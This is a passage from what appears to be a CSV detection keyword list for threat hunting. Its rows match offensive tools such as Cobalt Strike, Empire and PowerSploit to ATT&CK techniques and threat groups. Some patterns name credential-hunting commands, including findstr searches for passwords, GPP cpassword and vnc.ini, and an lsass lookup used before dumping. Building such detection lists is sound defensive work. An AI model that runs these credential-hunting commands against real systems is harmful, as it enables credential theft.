- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Find-LocalAdminAccess*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement Enumeration With PowerView,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Find-LocalAdminAccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Find-LocalAdminAccess*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Find-LocalAdminAccess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-LocalAdminAccess*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Find-LogonScriptCredentials -LogonScripts*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-LogonScriptCredentials.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*FindModule *.dll*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,0,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*FindObjects-BOF*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*Find-PathDLLHijack*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-PathDLLHijack*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Find-ProcessDLLHijack*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-ProcessDLLHijack*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*FindProcessTokenAndDuplicate*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*FindProcHandle *lsass*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,0,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*Find-ProtectionSoftware*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Find-PSScriptsInPSAppLog*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-PSServiceAccounts.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Find-RDPClientConnections*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FindSMB2UPTime.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Findsploit*,offensive_tool_keyword,Findsploit,Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c),T1210 - T1105 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/1N3/Findsploit,1,1,N/A,N/A,10,1493,334,2021-09-27T01:43:24Z,2015-03-16T16:15:55Z -*findstr *BEGIN CERTIFICATE*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*findstr *confidential*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*findstr *cpassword *\sysvol\*.xml*,greyware_tool_keyword,findstr,linux commands abused by attackers - gpp finder,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*findstr *net use*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*findstr *password*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*findstr *vnc.ini*,greyware_tool_keyword,findstr,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*findstr /si secret *.docx*,greyware_tool_keyword,findstr,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*findstr lsass*,offensive_tool_keyword,findstr,findstr used to find lsass pid in order to dump lsass process,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*findstr.exe Tvndrgaaa*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Findsubdomains*,offensive_tool_keyword,findsubdomains,A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.,T1590 - T1591 - T1595 - T1596 - T1599,TA0011,N/A,N/A,Information Gathering,https://findsubdomains.com/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Find-TrustedDocuments*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Find-TrustedDocuments.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-TrustedDocuments.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FindUncommonShares.git*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,1,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*FindUncommonShares.p*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 